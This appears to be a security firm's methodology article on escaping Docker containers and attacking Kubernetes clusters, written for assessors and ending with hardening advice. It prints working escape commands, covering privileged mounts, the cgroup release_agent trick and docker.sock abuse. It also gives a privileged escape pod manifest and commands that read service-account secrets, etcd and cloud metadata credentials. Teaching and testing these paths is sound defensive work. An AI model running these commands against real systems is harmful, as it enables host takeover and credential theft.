Skip to content
Fast-turnaround security assessments available — 10+ years development & security experienceGet started
methodologyTypical severity: Critical

Container Security: Escaping Docker and Attacking Kubernetes

·10 min read

Container Security: Escaping Docker and Attacking Kubernetes

Containers run on shared kernels. Unlike virtual machines, which interpose a hypervisor between a guest operating system and the hardware, containers share the host kernel directly. The isolation that makes containers appear separate comes from Linux namespaces and cgroups — kernel features that restrict visibility and resource access, not features that enforce hard security boundaries.

This distinction matters for security assessments. A misconfigured container is not just a compromised application. It is a foothold on the host, and in an orchestrated environment, potentially a path to every workload in the cluster.

The Privilege Hierarchy in Containerized Environments

Before examining specific escape paths, it helps to understand what "full compromise" means in each layer of a containerized stack.

Container process compromise means code execution within the container's filesystem and namespace with the container's privileges. The attacker can read files the application can read, make network connections the container's network policy allows, and interact with any APIs the container's service account can reach.

Host compromise means the container's isolation has been bypassed and the attacker has access to the underlying node — its filesystem, its processes, its network interfaces, and any other workloads running on it.

Cluster compromise means the attacker can deploy workloads, read secrets, and control configuration across the entire Kubernetes cluster, regardless of which namespace or node they started on.

Container escapes move an attacker from the first level to the second. Kubernetes misconfigurations often provide a direct path to the third.

Docker Container Escapes

Privileged Containers

The most direct path from container to host is the --privileged flag. A container launched with docker run --privileged has all Linux capabilities enabled, no seccomp profile enforced, and no AppArmor restrictions applied. The container can interact with the host kernel as if it were running natively.

The canonical escape is straightforward:

bash
# Inside a privileged container
fdisk -l                          # identify host block devices
mkdir /mnt/host
mount /dev/xvda1 /mnt/host        # mount the host filesystem
chroot /mnt/host                  # enter the host root

After the chroot, the attacker operates in the host filesystem with root privileges. Adding a backdoor user, writing an SSH authorized key, or installing a cron job is trivial from this position.

A second path that does not require knowing the block device is abusing host cgroup access:

bash
# Privileged containers can write to host cgroup release agents
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "id > /output" >> /cmd    # replace with actual payload
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# The release agent executes on the host when the cgroup empties

This technique executes a command on the host through the cgroup release agent mechanism without requiring the host filesystem to be mounted first.

Mounted Docker Socket

The Docker socket (/var/run/docker.sock) is the Unix socket through which Docker clients communicate with the Docker daemon. The daemon runs as root and has full control over every container on the host.

When a container has the Docker socket bind-mounted into it — a practice common in CI/CD environments where pipelines need to build and run containers — any process in that container can talk to the Docker daemon directly.

bash
# Inside a container with /var/run/docker.sock mounted
docker run -v /:/host -it --rm ubuntu:22.04 chroot /host

This single command, executed from inside a container with socket access, launches a new privileged container with the host filesystem mounted, then enters a shell with host root access. The container process effectively controls the Docker daemon and can use it to escape.

Testing for a mounted Docker socket requires only checking whether the path exists and is writable. Curl against the Docker API socket confirms accessibility:

bash
curl --unix-socket /var/run/docker.sock http://localhost/version

A successful response confirms full Docker API access and immediate host compromise potential.

Host Namespace Sharing

Docker allows specific host namespaces to be shared with containers: --pid=host, --network=host, --ipc=host. Each trades isolation for capability in ways that create security exposure.

--pid=host is particularly dangerous from an assessment perspective. A container with host PID namespace access can see all processes running on the host and send signals to them. More practically, it can access /proc/<pid>/root for any host process, which is a symlink to the root filesystem of the process's mount namespace — the host filesystem:

bash
# Inside a container with --pid=host
ls /proc/1/root/           # lists the host root filesystem
cp /proc/1/root/etc/shadow /tmp/shadow   # reads host shadow file

--network=host places the container in the host's network namespace, making it possible to listen on host ports and access host network interfaces directly — bypassing any container network policy that would otherwise restrict traffic.

Kubernetes Cluster Attacks

Service Account Token Abuse

Every Kubernetes pod runs under a service account. Unless the pod spec sets automountServiceAccountToken: false, a JWT token for the service account is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The token can authenticate to the Kubernetes API server:

bash
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc
 
# Enumerate what the service account can do
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" \
  "$APISERVER/api/v1/namespaces/default/secrets"

The critical question is what RBAC permissions are bound to the service account. Even if no explicit role binding exists, Kubernetes ships with a system:discovery role that is bound to all authenticated users by default, allowing the token to enumerate cluster resources.

More dangerous is the common pattern of binding the cluster-admin ClusterRole to the default service account in a namespace, or granting secrets:get to a service account that runs an application with untrusted input. With secrets:get on the cluster scope, the token can read every secret in every namespace — including other applications' database credentials, TLS private keys, and tokens for external services.

RBAC Privilege Escalation

RBAC misconfigurations fall into predictable patterns. The most impactful:

Wildcard permissions on resources. A role with verbs: ['*'] on resources: ['*'] is equivalent to cluster-admin for the service account. Wildcards in RBAC rules appear frequently when administrators create roles quickly and intend to restrict them later.

Create-pod access. A service account that can create pods can create a privileged pod with hostPID: true, hostNetwork: true, and a hostPath volume mounting the host filesystem. This is a full host escape through the API server:

yaml
apiVersion: v1
kind: Pod
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: escape
    image: ubuntu
    command: ["/bin/bash"]
    args: ["-c", "chroot /host bash"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /

Manage-roles or bind-clusterroles access. The ability to create or modify role bindings is effectively the ability to grant oneself any permission in the cluster. An attacker with create on rolebindings can create a binding that grants cluster-admin to their service account.

Exec into pods. The pods/exec subresource allows attaching to running containers. An attacker with this permission can execute commands in any pod in scope — including sensitive workloads like database administrators, secrets managers, or monitoring agents.

etcd Access

etcd is the key-value store that Kubernetes uses to persist all cluster state — including every Secret object, every Service Account token, and all configuration. By default, Kubernetes secrets are stored in etcd with only base64 encoding, not encrypted at rest.

An attacker with network access to the etcd endpoint (typically port 2379) and a valid client certificate can dump the entire cluster state:

bash
etcdctl --endpoints=https://etcd-host:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get / --prefix --keys-only

etcd should only be accessible from the API server and should require mutual TLS with a restricted CA. Assessment targets where etcd listens on a broader interface, or where the certificates are accessible from within a compromised pod, represent critical findings.

Cloud Metadata Endpoint Access

In cloud-managed Kubernetes environments, each node is a cloud instance with an associated instance metadata endpoint. On AWS, this is the Instance Metadata Service at 169.254.169.254. On GCP it is metadata.google.internal. On Azure it is 169.254.169.254 with a different API.

The metadata endpoint returns temporary credentials for the instance's IAM role without authentication. If the node's instance role has permissions beyond what the cluster itself needs — common when operators grant broad cloud API access for node autoscaling, load balancer management, or storage provisioning — any pod running on that node can retrieve those credentials:

bash
# From inside a pod on AWS
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns the role name, then:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/node-role
# Returns AccessKeyId, SecretAccessKey, SessionToken

With these credentials, the attacker can make calls to the cloud API with the permissions of the node role — potentially listing and downloading S3 buckets, describing EC2 infrastructure, assuming other IAM roles, or escalating further within the cloud environment.

IMDSv2 (AWS) requires a session-oriented request with a token obtained via PUT, which adds a layer of protection. But it only applies if explicitly configured. Clusters that have not enforced IMDSv2 on their node groups remain exposed.

Network policy can block pods from reaching 169.254.169.254, but only if network policy is enforced and the relevant egress rules are present.

Assessment Methodology

A container security assessment follows a consistent progression from the inside out.

From within a pod:

  1. Read the mounted service account token and query the API server — enumerate what the token can do
  2. Check for /var/run/docker.sock — its presence enables immediate host compromise
  3. Check the pod's security context: cat /proc/1/status | grep Cap reveals current capabilities; privileged: true is directly observable from inside
  4. Attempt to reach the cloud metadata endpoint — a successful response warrants credential retrieval and cloud privilege analysis
  5. Check environment variables for secrets passed as env vars rather than volumes

From the Kubernetes API:

  1. Enumerate ClusterRoleBindings for the default service account and any application service accounts
  2. Look for any subject with create access to pods, role bindings, or cluster role bindings
  3. Check for secrets accessible to assessed service accounts — the presence of dockerconfigjson secrets or cloud credentials in secrets indicates infrastructure-level access
  4. Review admission controller configuration — the absence of a pod security admission policy or OPA/Gatekeeper allows arbitrary pod specs including privileged workloads

Infrastructure review:

  1. Confirm etcd is not accessible from the pod network
  2. Confirm the API server's anonymous-auth is disabled
  3. Verify that node instance roles follow least privilege
  4. Check whether network policy enforces egress restrictions to the metadata endpoint

Hardening Guidance

The most impactful mitigations reduce the blast radius when a workload is compromised.

Disable service account token auto-mounting for pods that do not need API server access. Set automountServiceAccountToken: false in the pod spec or the service account itself.

Apply Pod Security Standards using Kubernetes' built-in admission controller. The restricted profile prohibits privileged containers, host namespace sharing, and host volume mounts. The baseline profile blocks the most common escape vectors while permitting most legitimate workloads.

Enforce least-privilege RBAC. Audit ClusterRoleBindings regularly. The default service account should have no bindings beyond the cluster defaults. Application service accounts should have narrowly scoped roles in their namespace only.

Block cloud metadata endpoints with network policy egress rules that deny traffic to link-local addresses from all pods except those that specifically require it.

Enable etcd encryption at rest using Kubernetes' EncryptionConfiguration. This does not prevent an attacker with etcd access from reading data, but it prevents offline analysis of etcd backups.

Audit container images for setuid binaries and excessive capabilities. The presence of nsenter, mount, fdisk, or other administrative binaries in a container image expands the options available to an attacker who achieves code execution.

Container security is layered. No single control makes a cluster uncompromisable. The goal is to ensure that a container compromise does not automatically translate to host or cluster compromise — and that each step toward escalation is visible in logs.

For a technical assessment of your containerized infrastructure, get in touch.

Need your application tested?

We find these vulnerabilities in real applications every day. Get a comprehensive security assessment with detailed remediation.

Request an Assessment

Summary

Containers offer process isolation, not security boundaries. Privileged containers, exposed Docker sockets, misconfigured Kubernetes RBAC, and accessible cloud metadata endpoints all create paths from a compromised container to full cluster or host compromise. Understanding these vectors is essential for assessing environments that rely on containerization as part of their security model.

Key Takeaways

  • 1Containers are not security boundaries — a privileged container has direct access to the host kernel and can escape to full host compromise in a single command
  • 2An exposed Docker socket inside a container gives the container process full control over the Docker daemon, equivalent to root on the host
  • 3Kubernetes service account tokens are automatically mounted into pods by default and can be used to query the API server with whatever RBAC permissions are assigned to the service account
  • 4RBAC misconfiguration in Kubernetes is the most common path to cluster-wide privilege escalation — overly permissive roles on default service accounts are frequently present in production clusters
  • 5Cloud metadata endpoints accessible from within pods can return instance credentials with permissions far exceeding what the application requires

Frequently Asked Questions

A container escape is a technique that allows a process running inside a container to access resources outside the container's intended isolation boundary — typically the host operating system, other containers on the same host, or the container orchestration layer. Container escapes exploit misconfiguration (privileged mode, host namespace sharing, mounted Docker sockets) rather than kernel vulnerabilities in most assessed environments. A successful container escape typically gives an attacker the equivalent of root on the host or the ability to deploy and control workloads across a cluster.

A privileged Docker container has all Linux capabilities enabled and no seccomp or AppArmor restrictions. The most direct escape path is mounting the host filesystem: running 'docker run --privileged' and then 'mount /dev/sda1 /mnt' gives read-write access to the host's root filesystem from inside the container. An attacker can add a cron job or SSH key to the host filesystem, then execute it from outside the container. The container process and the host share the same kernel, and privileged mode removes all the access controls that make kernel sharing safe.

An exposed Docker socket (/var/run/docker.sock) allows the container to communicate with the Docker daemon running on the host, with full API access. This means the container can spawn new containers with any configuration — including privileged containers with the host filesystem mounted. An attacker who gains code execution inside a container with the Docker socket mounted can immediately escalate to full host compromise by creating a new privileged container and using it as a foothold. The Docker socket is effectively a root backdoor when accessible from an untrusted workload.

Every pod in Kubernetes is assigned a service account, and a JWT token for that service account is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token inside the pod. This token can authenticate to the Kubernetes API server. If the service account has permissive RBAC bindings — particularly if it has access to create pods, get secrets, or modify cluster roles — an attacker with code execution in the pod can use the token to query or modify cluster state, read other pods' secrets, or create a new privileged pod on any node.

Cloud provider metadata endpoints (such as the instance metadata service on AWS, GCP, and Azure) are accessible from workloads running on cloud-managed Kubernetes nodes unless explicitly blocked by network policy. These endpoints return instance identity information and, critically, temporary credentials for the instance's IAM role. If the node's instance role has broad permissions — which is common when cluster autoscaler or other components need cloud API access — any pod running on that node can retrieve credentials that allow cloud API calls outside the cluster's intended security perimeter.